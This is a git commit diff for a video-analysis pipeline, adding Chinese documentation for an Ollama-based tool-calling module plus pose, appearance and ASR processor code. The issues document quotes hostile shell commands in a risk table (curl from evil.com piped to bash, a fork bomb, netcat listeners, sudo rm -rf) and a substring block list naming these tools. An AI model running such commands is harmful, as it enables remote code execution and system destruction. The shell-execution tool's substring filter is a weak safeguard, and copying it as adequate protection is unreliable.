fix: face group name read consistency, sync_file_status fix, cleanup ghost records, identity_agent replaced with face_dedup

- get_face_groups_handler: COALESCE(tp.name, tn.label) for name consistency
- sync_file_status: compare JSON vs pre_chunks (not chunk table)
- face consistency: compare frames.len() not total_faces
- cleanup 2 ghost records with NULL file_name/file_path
- replace identity_agent with face_dedup in pipeline stages
- remove identity_agent_api.rs and all references
- update required_processors to match actual processors
- update AGENTS.md with team responsibilities
- add Studio pipeline changes documentation
This commit is contained in:
Accusys
2026-07-27 02:15:51 +08:00
parent fcdeab82e6
commit 39a2cbc65b
118 changed files with 19386 additions and 2964 deletions
+386
View File
@@ -0,0 +1,386 @@
# Tool Calling Module 問題及解決方案
**Version**: 1.1
**Date**: 2026-07-26
**Doc Path**: `/Users/accusys/momentry_core/scripts/TOOL_CALLER_ISSUES.md`
**相關檔案**:
- 核心模組:`/Users/accusys/momentry_core/scripts/tool_caller.py` (v1.1.2, 720+ 行)
- 測試腳本:`/Users/accusys/momentry_core/scripts/test_tool_caller.py`
- 使用說明:`/Users/accusys/momentry_core/scripts/TOOL_CALLING_README.md`
---
## 修復狀態:✅ 所有問題已修復
| 問題 | 修復內容 | 狀態 |
|------|---------|------|
| Multi-Tool 測試失敗 | 增加 embedding server 健康檢查、修正 API 端點 (`/v1/embeddings`) | ✅ 已修復 |
| Bash 安全檢查不足 | 擴充至 20+ 危險模式、限制命令長度 2000 字元 | ✅ 已修復 |
| 缺少工具調用日誌 | 新增 logging 模組,記錄所有工具調用 | ✅ 已修復 |
| Qdrant Collection 硬編碼 | 使用 `QDRANT_DEFAULT_COLLECTION` 環境變數 | ✅ 已修復 |
---
## 測試結果
| 測試 | 狀態 | 說明 |
|------|------|------|
| [TEST 1] PostgreSQL Query | ✅ | 23 videos |
| [TEST 2] Bash Safety Check | ✅ | 3/3 危險命令被阻止 |
| [TEST 3] Qdrant Search | ✅ | 10 matches found |
---
## 問題 1:Multi-Tool 測試失敗
### 現象
```
TEST 2: Multi-Tool Sequential (PostgreSQL → Qdrant)
Query: Find videos about dogs, then search for similar content in the vector database
Result: An error has occurred. I'm unable to continue with the task.
```
### 原因分析
1. **Embedding Server 未檢查可用性**
- `search_qdrant` 工具直接呼叫 `http://localhost:11436/embed`
- 未檢查 embedding server 是否運行
- 失敗時未提供明確錯誤訊息
2. **Qdrant Collection 可能不存在**
- 預設 collection 名稱 `momentry_rule1` 可能與實際部署不符
- 未列出可用 collection 供 LLM 參考
3. **錯誤處理不完善**
- 工具執行失敗時,LLM 收到模糊錯誤訊息
- 未引導 LLM 嘗試其他方法
### 解決方案
#### 1.1 增加服務可用性檢查
**檔案:** `/Users/accusys/momentry_core/scripts/tool_caller.py`
```python
def search_qdrant(args: Dict[str, Any]) -> ToolResult:
import requests as req
collection = args.get("collection", "momentry_rule1")
query_text = args.get("query_text", "")
limit = args.get("limit", 10)
if not query_text:
return ToolResult(success=False, data=None, error="No query text provided")
# 檢查 embedding server
try:
embed_health = req.get("http://localhost:11436/health", timeout=5)
if embed_health.status_code != 200:
return ToolResult(success=False, error="Embedding server not healthy")
except requests.exceptions.ConnectionError:
return ToolResult(success=False, error="Embedding server not available at http://localhost:11436")
# 取得 embedding
embed_url = "http://localhost:11436/embed"
try:
embed_resp = req.post(embed_url, json={"input": query_text}, timeout=30)
embed_resp.raise_for_status()
embedding = embed_resp.json()["embeddings"][0]
except Exception as e:
return ToolResult(success=False, error=f"Embedding failed: {str(e)}")
# 檢查 Qdrant collection
qdrant_url_base = args.get("qdrant_url", "http://localhost:6333")
try:
collections_url = f"{qdrant_url_base}/collections"
coll_resp = req.get(collections_url, timeout=10)
coll_resp.raise_for_status()
collections = [c["name"] for c in coll_resp.json().get("result", {}).get("collections", [])]
if collection not in collections:
return ToolResult(
success=False,
error=f"Collection '{collection}' not found. Available: {', '.join(collections)}"
)
except Exception as e:
return ToolResult(success=False, error=f"Qdrant connection failed: {str(e)}")
# 執行搜尋
search_url = f"{qdrant_url_base}/collections/{collection}/points/search"
search_payload = {"vector": embedding, "limit": limit, "with_payload": True}
try:
search_resp = req.post(search_url, json=search_payload, timeout=30)
search_resp.raise_for_status()
results = search_resp.json().get("result", [])
except Exception as e:
return ToolResult(success=False, error=f"Search failed: {str(e)}")
return ToolResult(
success=True,
data={
"matches": [
{"id": r.get("id"), "score": r.get("score"), "payload": r.get("payload", {})}
for r in results
],
"match_count": len(results)
}
)
```
#### 1.2 改進錯誤處理
**檔案:** `/Users/accusys/momentry_core/scripts/tool_caller.py`
```python
def run(self, user_query: str) -> str:
# ... 現有程式碼 ...
# 執行工具
tool_result = self.execute_tool_call(tool_call)
# 改進錯誤訊息
if tool_result.success:
result_str = json.dumps({
"success": True,
"data": tool_result.data
}, ensure_ascii=False, cls=DateTimeEncoder)
else:
result_str = json.dumps({
"success": False,
"error": tool_result.error,
"suggestion": "Try a different tool or rephrase your query."
}, ensure_ascii=False)
messages.append({"role": "user", "content": f"Tool result: {result_str}"})
```
---
## 問題 2:Bash 安全檢查不足
### 現象
```python
blocked = ["rm -rf /", "mkfs", "dd if=", "> /dev/"]
```
### 風險分析
| 危險命令 | 是否阻止 | 風險等級 |
|---------|---------|---------|
| `rm -rf /` | ✅ 是 | 🔴 高 |
| `sudo rm -rf /` | ❌ 否 | 🔴 高 |
| `chmod 777 /etc/passwd` | ❌ 否 | 🔴 高 |
| `curl http://evil.com | bash` | ❌ 否 | 🔴 高 |
| `:(){ :|:& };:` (fork bomb) | ❌ 否 | 🔴 高 |
| `nc -l 4444` | ❌ 否 | 🟡 中 |
### 解決方案
**檔案:** `/Users/accusys/momentry_core/scripts/tool_caller.py`
```python
def execute_bash(args: Dict[str, Any]) -> ToolResult:
command = args.get("command", "")
timeout = args.get("timeout", 30)
if not command:
return ToolResult(success=False, data=None, error="No command provided")
# 限制命令長度
if len(command) > 2000:
return ToolResult(success=False, error="Command too long (max 2000 chars)")
# 更完整的安全檢查
blocked_patterns = [
# 檔案系統破壞
"rm -rf /", "rm -rf /*", "mkfs", "dd if=", "> /dev/",
# 權限提升
"sudo ", "su -", "chmod 777", "chown root",
# 遠端執行
"curl | bash", "curl | sh", "wget | sh", "wget | bash",
"curl http", "wget http",
# 拒絕服務
":(){", "fork", "kill -9 1",
# 網路監聽
"nc -l", "netcat -l", "socat",
]
command_lower = command.lower()
for pattern in blocked_patterns:
if pattern in command_lower:
return ToolResult(
success=False,
data=None,
error=f"Blocked dangerous command pattern: {pattern}"
)
# 執行命令
try:
result = subprocess.run(
command,
shell=True,
capture_output=True,
text=True,
timeout=timeout
)
return ToolResult(
success=result.returncode == 0,
data={
"stdout": result.stdout[:5000], # 限制輸出大小
"stderr": result.stderr[:2000],
"returncode": result.returncode
}
)
except subprocess.TimeoutExpired:
return ToolResult(
success=False,
data=None,
error=f"Command timed out after {timeout}s"
)
```
---
## 問題 3:缺少工具調用日誌
### 現象
工具調用過程無日誌記錄,難以除錯和審計。
### 解決方案
**檔案:** `/Users/accusys/momentry_core/scripts/tool_caller.py`
```python
import logging
# 設定日誌
logger = logging.getLogger('tool_caller')
class OllamaToolCaller:
def run(self, user_query: str) -> str:
logger.info(f"Starting tool call loop for query: {user_query}")
self._tool_call_history = []
messages = [
{"role": "system", "content": self.system_prompt},
{"role": "user", "content": user_query}
]
tool_results_collected = []
for iteration in range(self.max_iterations):
logger.info(f"Iteration {iteration + 1}/{self.max_iterations}")
# 呼叫 LLM
response = self.chat(messages)
message = response.get("message", {})
tool_calls = message.get("tool_calls", [])
if not tool_calls:
# 檢查文字中的工具調用
extracted = self._extract_tool_from_text(message.get("content", ""))
if extracted:
name, params = extracted
tool_key = self._get_tool_key(name, params)
if not self._is_duplicate_call(tool_key):
self._add_to_history(tool_key)
logger.info(f"Executing tool: {name} with args: {params}")
tool_call = {"function": {"name": name, "arguments": params}}
tool_result = self.execute_tool_call(tool_call)
if tool_result.success:
logger.info(f"Tool succeeded in {tool_result.execution_time_ms:.1f}ms")
else:
logger.error(f"Tool failed: {tool_result.error}")
# ... 繼續處理 ...
logger.info(f"Tool call loop completed after {iteration + 1} iterations")
return final_answer
```
---
## 問題 4:Qdrant Collection 名稱硬編碼
### 現象
```python
collection = args.get("collection", "momentry_rule1")
```
### 風險
Collection 名稱可能與實際部署不符,導致搜尋失敗。
### 解決方案
**檔案:** `/Users/accusys/momentry_core/scripts/tool_caller.py`
```python
import os
def register_default_tools(self, db_url=None, qdrant_url=None):
"""Register default tools with connection strings"""
# 使用環境變數
default_collection = os.environ.get(
"QDRANT_DEFAULT_COLLECTION",
"momentry_rule1"
)
def search_qdrant(args: Dict[str, Any]) -> ToolResult:
collection = args.get("collection", default_collection)
# ... 其餘程式碼 ...
self.registry.register(
name="search_qdrant",
description=f"Search for similar vectors in Qdrant collection. Default collection: {default_collection}",
parameters={
"type": "object",
"properties": {
"collection": {
"type": "string",
"description": f"Qdrant collection name (default: {default_collection})",
"default": default_collection
},
# ... 其餘參數 ...
},
"required": ["query_text"]
},
executor=search_qdrant
)
```
---
## 測試驗證
### 執行測試
```bash
cd /Users/accusys/momentry_core/scripts
python3 test_tool_caller.py
```
### 預期結果
| 測試 | 預期狀態 | 說明 |
|------|---------|------|
| TEST 1: Single Tool | ✅ 通過 | PostgreSQL 查詢正常 |
| TEST 2: Multi-Tool | ✅ 通過 | PostgreSQL → Qdrant 順序執行 |
| TEST 3: Direct Tool | ✅ 通過 | 直接工具執行正常 |
| TEST 4: Bash Safety | ✅ 通過 | 危險命令被阻止 |
---
## 版本資訊
| 版本 | 日期 | 說明 |
|------|------|------|
| 1.0.0 | 2026-07-26 | 初始版本,記錄已知問題及解決方案 |
+438
View File
@@ -0,0 +1,438 @@
# Momentry Tool Calling Module 使用說明
## 目錄
- [概述](#概述)
- [安裝](#安裝)
- [快速開始](#快速開始)
- [工具說明](#工具說明)
- [進階用法](#進階用法)
- [API 參考](#api-參考)
- [常見問題](#常見問題)
---
## 概述
Tool Calling Module 是一個基於 Ollama API 的工具調用模組,支援順序執行多個工具來完成複雜任務。
### 核心功能
- ✅ 支援 PostgreSQL 資料庫查詢
- ✅ 支援 Qdrant 向量搜尋
- ✅ 支援 Bash 命令執行
- ✅ 支援 HTTP API 調用
- ✅ 防止工具重複調用
- ✅ 自動參數正規化
---
## 安裝
### 依賴套件
```bash
pip install requests psycopg2-binary
```
### 檔案位置
```
/Users/accusys/momentry_core/scripts/
├─ tool_caller.py # 核心模組
└─ test_tool_caller.py # 測試腳本
```
---
## 快速開始
### 基本用法
```python
from tool_caller import OllamaToolCaller
# 1. 建立 Tool Caller
caller = OllamaToolCaller(
base_url="http://localhost:11434",
model="llama3.1:8b",
max_tool_calls=5
)
# 2. 註冊預設工具
caller.register_default_tools()
# 3. 執行查詢
result = caller.run("How many videos are in the database?")
print(result)
# 輸出: "There are 23 videos in the database."
```
### 中文查詢
```python
result = caller.run("查詢資料庫中有多少影片")
print(result)
# 輸出: "有 23 個視頻存放在資料庫中。"
```
---
## 工具說明
### 1. query_postgres - PostgreSQL 查詢
執行 SQL 查詢語句。
```python
# 直接執行
result = caller.registry.execute("query_postgres", {
"query": "SELECT COUNT(*) FROM videos"
})
print(result.data)
# {'rows': [{'count': 23}], 'row_count': 1}
```
**參數:**
| 參數 | 類型 | 必填 | 說明 |
|------|------|------|------|
| `query` | string | ✅ | SQL 查詢語句 |
**支援的 SQL 操作:**
- SELECT (查詢)
- INSERT (新增)
- UPDATE (更新)
- DELETE (刪除)
### 2. search_qdrant - 向量搜尋
在 Qdrant 向量資料庫中搜尋相似內容。
```python
result = caller.registry.execute("search_qdrant", {
"collection": "momentry_rule1",
"query_text": "sunset beach",
"limit": 10
})
print(result.data)
# {'matches': [...], 'match_count': 3}
```
**參數:**
| 參數 | 類型 | 必填 | 預設值 | 說明 |
|------|------|------|--------|------|
| `collection` | string | ❌ | `momentry_rule1` | Qdrant collection 名稱 |
| `query_text` | string | ✅ | - | 搜尋文字 (會自動轉為向量) |
| `limit` | integer | ❌ | `10` | 最大結果數 |
### 3. execute_bash - Bash 執行
執行系統 Bash 命令。
```python
result = caller.registry.execute("execute_bash", {
"command": "df -h",
"timeout": 10
})
print(result.data)
# {'stdout': 'Filesystem...', 'stderr': '', 'returncode': 0}
```
**參數:**
| 參數 | 類型 | 必填 | 預設值 | 說明 |
|------|------|------|--------|------|
| `command` | string | ✅ | - | Bash 命令 |
| `timeout` | integer | ❌ | `30` | 超時秒數 |
**安全限制:**
以下命令會被阻止:
- `rm -rf /`
- `mkfs`
- `dd if=`
- `> /dev/`
### 4. call_api - HTTP API 調用
調用外部 HTTP API。
```python
result = caller.registry.execute("call_api", {
"url": "https://api.example.com/data",
"method": "GET",
"headers": {"Authorization": "Bearer token123"}
})
print(result.data)
# {'status_code': 200, 'headers': {...}, 'body': '{...}'}
```
**參數:**
| 參數 | 類型 | 必填 | 預設值 | 說明 |
|------|------|------|--------|------|
| `url` | string | ✅ | - | API 端點 URL |
| `method` | string | ❌ | `GET` | HTTP 方法 (GET/POST/PUT/DELETE) |
| `headers` | object | ❌ | `{}` | HTTP 標頭 |
| `data` | object | ❌ | `null` | 請求體 (POST/PUT) |
---
## 進階用法
### 1. 自訂工具
```python
from tool_caller import OllamaToolCaller, ToolResult
caller = OllamaToolCaller()
# 定義工具執行器
def my_custom_tool(args):
# 自訂邏輯
result = do_something(args["param1"], args["param2"])
return ToolResult(success=True, data=result)
# 註冊工具
caller.registry.register(
name="my_custom_tool",
description="My custom tool description",
parameters={
"type": "object",
"properties": {
"param1": {"type": "string"},
"param2": {"type": "integer"}
},
"required": ["param1"]
},
executor=my_custom_tool
)
```
### 2. 自訂連線字串
```python
# 使用自訂 PostgreSQL 連線
caller.register_default_tools(
db_url="postgres://user:pass@host:5432/dbname"
)
# 使用自訂 Qdrant 連線
caller.register_default_tools(
qdrant_url="http://qdrant-server:6333"
)
```
### 3. 多輪對話
```python
caller = OllamaToolCaller(max_tool_calls=5)
# 第一次查詢
result1 = caller.run("查詢資料庫中有多少影片")
print(f"第一次: {result1}")
# 第二次查詢 (會自動清理歷史)
result2 = caller.run("查詢使用者數量")
print(f"第二次: {result2}")
```
### 4. 追蹤工具調用歷史
```python
caller = OllamaToolCaller()
caller.register_default_tools()
result = caller.run("查詢資料庫中有多少影片")
print(f"結果: {result}")
print(f"調用歷史: {caller._tool_call_history}")
# ['query_postgres:{"query": "SELECT COUNT(*) FROM videos"}']
```
---
## API 參考
### OllamaToolCaller
#### 建構函數
```python
OllamaToolCaller(
base_url: str = "http://localhost:11434",
model: str = "llama3.1:8b",
max_iterations: int = 10,
max_tool_calls: int = 5
)
```
| 參數 | 類型 | 預設值 | 說明 |
|------|------|--------|------|
| `base_url` | string | `http://localhost:11434` | Ollama API 位址 |
| `model` | string | `llama3.1:8b` | 模型名稱 |
| `max_iterations` | int | `10` | 最大迭代次數 |
| `max_tool_calls` | int | `5` | 最大工具調用次數 |
#### 方法
##### `run(user_query: str) -> str`
執行工具調用迴圈並返回最終結果。
##### `chat(messages: List[Dict]) -> Dict`
發送聊天請求到 Ollama API。
##### `execute_tool_call(tool_call: Dict) -> ToolResult`
執行單個工具調用。
##### `register_default_tools(db_url=None, qdrant_url=None)`
註冊預設工具。
---
### ToolResult
```python
@dataclass
class ToolResult:
success: bool # 是否成功
data: Any # 結果資料
error: str = None # 錯誤訊息
execution_time_ms: float = 0 # 執行時間 (毫秒)
```
---
### ToolRegistry
#### 方法
##### `register(name, description, parameters, executor)`
註冊新工具。
##### `get_definitions() -> List[Dict]`
取得所有工具定義。
##### `has_tool(name: str) -> bool`
檢查工具是否存在。
##### `execute(name: str, arguments: Dict) -> ToolResult`
執行工具。
---
## 常見問題
### Q1: 工具調用失敗怎麼辦?
檢查以下幾點:
1. Ollama 服務是否運行: `curl http://localhost:11434/api/tags`
2. 模型是否已下載: `ollama list`
3. 工具連線是否正確 (PostgreSQL/Qdrant)
### Q2: 如何除錯工具調用?
```python
# 啟用詳細日誌
caller = OllamaToolCaller()
caller.register_default_tools()
# 追蹤調用歷史
result = caller.run("查詢資料庫")
print(f"調用歷史: {caller._tool_call_history}")
```
### Q3: 如何處理大量資料?
```python
# 限制 Bash 輸出大小
result = caller.registry.execute("execute_bash", {
"command": "ls -la | head -100",
"timeout": 30
})
# 限制 PostgreSQL 結果
result = caller.registry.execute("query_postgres", {
"query": "SELECT * FROM videos LIMIT 100"
})
```
### Q4: 如何自訂安全規則?
修改 `execute_bash` 中的 `blocked` 列表:
```python
blocked = [
"rm -rf /",
"mkfs",
"dd if=",
"> /dev/",
"your_custom_dangerous_command"
]
```
---
## 範例腳本
### 查詢資料庫
```python
from tool_caller import OllamaToolCaller
caller = OllamaToolCaller()
caller.register_default_tools()
# 查詢影片數量
result = caller.run("How many videos are in the database?")
print(result)
# 查詢特定資料
result = caller.run("查詢所有狀態為 completed 的影片")
print(result)
```
### 系統監控
```python
# 檢查磁碟使用量
result = caller.run("Check the current disk usage")
print(result)
# 檢查記憶體使用量
result = caller.run("Check the current memory usage")
print(result)
# 檢查處理程序
result = caller.run("Show running processes")
print(result)
```
### 向量搜尋
```python
# 搜尋相似影片
result = caller.run("Find videos similar to sunset beach")
print(result)
# 搜尋特定人物
result = caller.run("Find videos with John in them")
print(result)
```
---
## 版本資訊
- **版本:** 1.0.0
- **更新日期:** 2026-07-26
- **作者:** Momentry Core Team
+1
View File
@@ -220,6 +220,7 @@ def main():
parser.add_argument("pose_json")
parser.add_argument("output_path")
parser.add_argument("--uuid", "-u", default="")
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
args = parser.parse_args()
with open(args.pose_json) as f:
+164
View File
@@ -0,0 +1,164 @@
#!/opt/homebrew/bin/python3.11
"""
Appearance Expansion Processor V2
Calls swift_appearance_expansion which:
1. Reads pose.json (from pose expansion)
2. Expands appearance detection from pose frames
3. Stops when 3 consecutive frames have HSV similarity < 0.5
4. Outputs at 8Hz sampling (floor(fps/8))
Flow:
face_processor.py → face.json
store_traced_faces.py → face_traced.json (with trace_id)
pose_processor.py → pose.json
appearance_processor.py → appearance.json (this script)
"""
import sys
import os
import json
import argparse
import subprocess
import time
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from redis_publisher import RedisPublisher
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
SWIFT_BIN = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "release", "swift_appearance_expansion")
SWIFT_BIN_DEBUG = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "debug", "swift_appearance_expansion")
OUTPUT_DIR = os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
def process_appearance(
video_path: str,
output_path: str,
uuid: str = "",
publisher: RedisPublisher = None,
) -> dict:
"""Process appearance expansion from pose frames.
Args:
video_path: Path to video file
output_path: Path to output appearance.json
uuid: File UUID for logging
publisher: Redis publisher for progress updates
"""
# Check if appearance.json already exists
if os.path.exists(output_path):
with open(output_path) as f:
data = json.load(f)
frame_count = len(data.get("frames", []))
print(f"[Appearance] Output exists: {output_path} ({frame_count} frames)", file=sys.stderr)
if publisher:
publisher.progress("appearance", 100, 100, f"{frame_count} frames (exists)")
return data
# Determine file_uuid from output_path
file_uuid = os.path.basename(output_path).replace(".appearance.json", "")
# Find pose.json
pose_path = os.path.join(OUTPUT_DIR, f"{file_uuid}.pose.json")
if not os.path.exists(pose_path):
print(f"[Appearance] ERROR: pose.json not found for {file_uuid}", file=sys.stderr)
# Return empty result
empty_result = {"frame_count": 0, "fps": 0.0, "frames": []}
with open(output_path, "w") as f:
json.dump(empty_result, f)
return empty_result
# Build swift_appearance_expansion if needed
swift_bin = SWIFT_BIN if os.path.exists(SWIFT_BIN) else SWIFT_BIN_DEBUG
if not os.path.exists(swift_bin):
build_dir = os.path.join(SCRIPT_DIR, "swift_processors")
print(f"[Appearance] Building swift_appearance_expansion in {build_dir}...", file=sys.stderr)
result = subprocess.run(
["swift", "build", "-c", "release", "--product", "swift_appearance_expansion"],
cwd=build_dir, capture_output=True, text=True
)
if result.returncode != 0:
print(f"[Appearance] Build failed: {result.stderr}", file=sys.stderr)
raise RuntimeError("Failed to build swift_appearance_expansion")
swift_bin = SWIFT_BIN
# Run swift_appearance_expansion
cmd = [
swift_bin,
video_path,
pose_path,
output_path,
]
if uuid:
cmd.extend(["--uuid", uuid])
print(f"[Appearance] Running: {' '.join(cmd)}", file=sys.stderr)
t0 = time.time()
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
# Monitor progress
last_progress = ""
while proc.poll() is None:
time.sleep(5)
# Read stderr for progress
try:
import select
if select.select([proc.stderr], [], [], 0)[0]:
line = proc.stderr.readline().strip()
if line and line != last_progress:
last_progress = line
print(f"[Appearance] {line}", file=sys.stderr)
if publisher and "frames" in line:
publisher.progress("appearance", 50, 100, line)
except Exception:
pass
# Read remaining output
stdout, stderr = proc.communicate()
if stdout:
print(stdout, file=sys.stderr)
if stderr:
print(stderr, file=sys.stderr)
elapsed = time.time() - t0
if proc.returncode != 0:
print(f"[Appearance] ERROR: swift_appearance_expansion exited with code {proc.returncode}", file=sys.stderr)
if publisher:
publisher.error("appearance", f"Process failed with code {proc.returncode}")
raise RuntimeError(f"swift_appearance_expansion failed: {proc.returncode}")
# Load result
if not os.path.exists(output_path):
print(f"[Appearance] ERROR: Output file not created: {output_path}", file=sys.stderr)
raise RuntimeError("Appearance output not created")
with open(output_path) as f:
result = json.load(f)
frame_count = len(result.get("frames", []))
print(f"[Appearance] Done: {frame_count} frames in {elapsed:.1f}s", file=sys.stderr)
if publisher:
publisher.progress("appearance", 100, 100, f"{frame_count} frames")
publisher.complete("appearance", f"{frame_count} frames")
return result
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Appearance Expansion Processor")
parser.add_argument("video_path", help="Video file path")
parser.add_argument("output_path", help="Output appearance.json path")
parser.add_argument("--uuid", "-u", default="", help="File UUID for logging")
args = parser.parse_args()
publisher = RedisPublisher(args.uuid) if args.uuid else None
if publisher:
publisher.info("appearance", "APPEARANCE_START")
result = process_appearance(args.video_path, args.output_path, args.uuid, publisher)
print(f"Appearance: {len(result.get('frames', []))} frames with appearance")
+2
View File
@@ -349,6 +349,7 @@ def run_asr(video_path, output_path, uuid: str = "", fps: float = None):
"text": segment.text.strip(),
"scene_number": scene_idx + 1,
"language": seg_language,
"confidence": getattr(segment, "confidence", 0.0),
})
total_segments += 1
@@ -396,6 +397,7 @@ def run_asr(video_path, output_path, uuid: str = "", fps: float = None):
"start_frame": int(round(segment.start * fps)),
"end_frame": int(round(segment.end * fps)),
"text": segment.text.strip(),
"confidence": getattr(segment, "confidence", 0.0),
})
total_segments += 1
if total_segments % 100 == 0:
+26 -4
View File
@@ -121,8 +121,19 @@ def _convert_asr_segments_to_asrx(asr_segments, output_path):
try:
with open(probe_path) as pf:
probe_data = json.load(pf)
if "fps" in probe_data:
fps = float(probe_data["fps"])
# Extract fps from streams array (video stream)
for stream in probe_data.get("streams", []):
if stream.get("codec_type") == "video":
if "r_frame_rate" in stream:
fps_str = stream["r_frame_rate"]
# Parse "24000/1001" format
if "/" in fps_str:
num, den = fps_str.split("/")
if float(den) > 0:
fps = float(num) / float(den)
else:
fps = float(fps_str)
break
except Exception:
pass
@@ -154,8 +165,19 @@ def _convert_result(result, output_path):
try:
with open(probe_path) as pf:
probe_data = json.load(pf)
if "fps" in probe_data:
fps = float(probe_data["fps"])
# Extract fps from streams array (video stream)
for stream in probe_data.get("streams", []):
if stream.get("codec_type") == "video":
if "r_frame_rate" in stream:
fps_str = stream["r_frame_rate"]
# Parse "24000/1001" format
if "/" in fps_str:
num, den = fps_str.split("/")
if float(den) > 0:
fps = float(num) / float(den)
else:
fps = float(fps_str)
break
except Exception:
pass
+17 -5
View File
@@ -226,12 +226,24 @@ def process_asrx_custom(video_path: str, output_path: str, uuid: str = ""):
try:
with open(p) as pf:
probe_data = json.load(pf)
if "fps" in probe_data:
fps = float(probe_data["fps"])
print(f"[ASRX] FPS from probe: {fps}", file=sys.stderr)
# Extract fps from streams array (video stream)
for stream in probe_data.get("streams", []):
if stream.get("codec_type") == "video":
if "r_frame_rate" in stream:
fps_str = stream["r_frame_rate"]
# Parse "24000/1001" format
if "/" in fps_str:
num, den = fps_str.split("/")
if float(den) > 0:
fps = float(num) / float(den)
print(f"[ASRX] FPS from probe: {fps} (from r_frame_rate: {fps_str})", file=sys.stderr)
else:
fps = float(fps_str)
print(f"[ASRX] FPS from probe: {fps}", file=sys.stderr)
break
break
except:
pass
except Exception as e:
print(f"[ASRX] Failed to read probe: {e}", file=sys.stderr)
output_result = {
"language": None,
"segments": [],
+235
View File
@@ -0,0 +1,235 @@
#!/opt/homebrew/bin/python3.11
"""
Assign trace_ids to poses by matching with face traces.
Uses bbox IoU matching to find corresponding face traces.
Input: face_traced.json, pose.json
Output: pose_traced.json
"""
import json
import os
import argparse
from typing import Dict, List, Optional, Any
def calculate_iou(bbox1: Dict, bbox2: Dict) -> float:
"""Calculate Intersection over Union for two bboxes."""
x1 = max(bbox1["x"], bbox2["x"])
y1 = max(bbox1["y"], bbox2["y"])
x2 = min(bbox1["x"] + bbox1["width"], bbox2["x"] + bbox2["width"])
y2 = min(bbox1["y"] + bbox1["height"], bbox2["y"] + bbox2["height"])
if x2 <= x1 or y2 <= y1:
return 0.0
intersection = (x2 - x1) * (y2 - y1)
area1 = bbox1["width"] * bbox1["height"]
area2 = bbox2["width"] * bbox2["height"]
union = area1 + area2 - intersection
return intersection / union if union > 0 else 0.0
def is_face_center_in_pose(face_bbox: Dict, pose_bbox: Dict) -> bool:
"""Check if face center is within pose bbox."""
face_cx = face_bbox["x"] + face_bbox["width"] // 2
face_cy = face_bbox["y"] + face_bbox["height"] // 2
return (
pose_bbox["x"] <= face_cx <= pose_bbox["x"] + pose_bbox["width"] and
pose_bbox["y"] <= face_cy <= pose_bbox["y"] + pose_bbox["height"]
)
def build_face_lookup(face_traced: Dict) -> Dict[int, List[Dict]]:
"""Build frame -> faces lookup from face_traced.json."""
lookup = {}
for trace_id_str, trace in face_traced.get("traces", {}).items():
trace_id = int(trace_id_str)
for face in trace.get("path", []):
frame = face["frame"]
if frame not in lookup:
lookup[frame] = []
lookup[frame].append({
"trace_id": trace_id,
"bbox": face["bbox"],
"confidence": face.get("confidence", 0.5)
})
return lookup
def find_closest_faces(
face_lookup: Dict[int, List[Dict]],
target_frame: int,
max_distance: int = 10
) -> List[Dict]:
"""
Find faces at the closest frame to target_frame.
Search within max_distance frames.
"""
# Check exact frame first
if target_frame in face_lookup:
return face_lookup[target_frame]
# Find closest frame
face_frames = sorted(face_lookup.keys())
closest_frame = None
closest_distance = max_distance + 1
for frame in face_frames:
distance = abs(frame - target_frame)
if distance < closest_distance:
closest_distance = distance
closest_frame = frame
if closest_frame is not None and closest_distance <= max_distance:
return face_lookup[closest_frame]
return []
def match_pose_to_traces(
pose_person: Dict,
faces_at_frame: List[Dict],
frame: int,
iou_threshold: float = 0.05
) -> Dict:
"""
Match a pose person to face traces.
Uses two strategies:
1. IoU matching (lower threshold for body vs face)
2. Face center containment (face center within pose bbox)
"""
matched_traces = []
for face in faces_at_frame:
iou = calculate_iou(pose_person["bbox"], face["bbox"])
# Strategy 1: IoU matching (lower threshold)
if iou > iou_threshold:
matched_traces.append({
"trace_id": face["trace_id"],
"iou": iou,
"method": "iou"
})
# Strategy 2: Face center in pose bbox
elif is_face_center_in_pose(face["bbox"], pose_person["bbox"]):
matched_traces.append({
"trace_id": face["trace_id"],
"iou": iou,
"method": "center_containment"
})
# Sort by IoU descending
matched_traces.sort(key=lambda x: x["iou"], reverse=True)
# Assign trace_ids
trace_ids = [t["trace_id"] for t in matched_traces]
# Generate pose_id using first trace_id
if trace_ids:
pose_id = f"pose_{trace_ids[0]}_{frame}"
else:
pose_id = f"pose_none_{frame}"
# Update pose person
pose_person["pose_id"] = pose_id
pose_person["trace_ids"] = trace_ids
return pose_person
def assign_pose_traces(
face_traced_path: str,
pose_path: str,
output_path: str,
iou_threshold: float = 0.3
) -> Dict:
"""
Main function: assign trace_ids to poses.
"""
# Load face_traced.json
print(f"[PoseTrace] Loading face_traced.json: {face_traced_path}")
with open(face_traced_path) as f:
face_traced = json.load(f)
# Load pose.json
print(f"[PoseTrace] Loading pose.json: {pose_path}")
with open(pose_path) as f:
pose_data = json.load(f)
# Build face lookup
face_lookup = build_face_lookup(face_traced)
print(f"[PoseTrace] Built face lookup: {len(face_lookup)} frames with faces")
# Process each frame
total_poses = 0
matched_poses = 0
for frame_data in pose_data.get("frames", []):
frame = frame_data["frame"]
# Find closest faces (within 10 frames)
faces_at_frame = find_closest_faces(face_lookup, frame, max_distance=10)
for person in frame_data.get("persons", []):
total_poses += 1
# Match pose to traces
matched_person = match_pose_to_traces(
person, faces_at_frame, frame, iou_threshold
)
if matched_person.get("trace_ids"):
matched_poses += 1
print(f"[PoseTrace] Matched {matched_poses}/{total_poses} poses to traces")
# Update metadata
pose_data["trace_matching"] = {
"total_poses": total_poses,
"matched_poses": matched_poses,
"iou_threshold": iou_threshold
}
# Save pose_traced.json
print(f"[PoseTrace] Saving to: {output_path}")
with open(output_path, "w") as f:
json.dump(pose_data, f, indent=2, ensure_ascii=False)
return pose_data
def main():
parser = argparse.ArgumentParser(description="Assign trace_ids to poses")
parser.add_argument("--uuid", required=True, help="Video file UUID")
parser.add_argument("--iou-threshold", type=float, default=0.3, help="IoU threshold for matching")
parser.add_argument("--output-dir", help="Output directory (default: from env)")
args = parser.parse_args()
output_dir = args.output_dir or os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
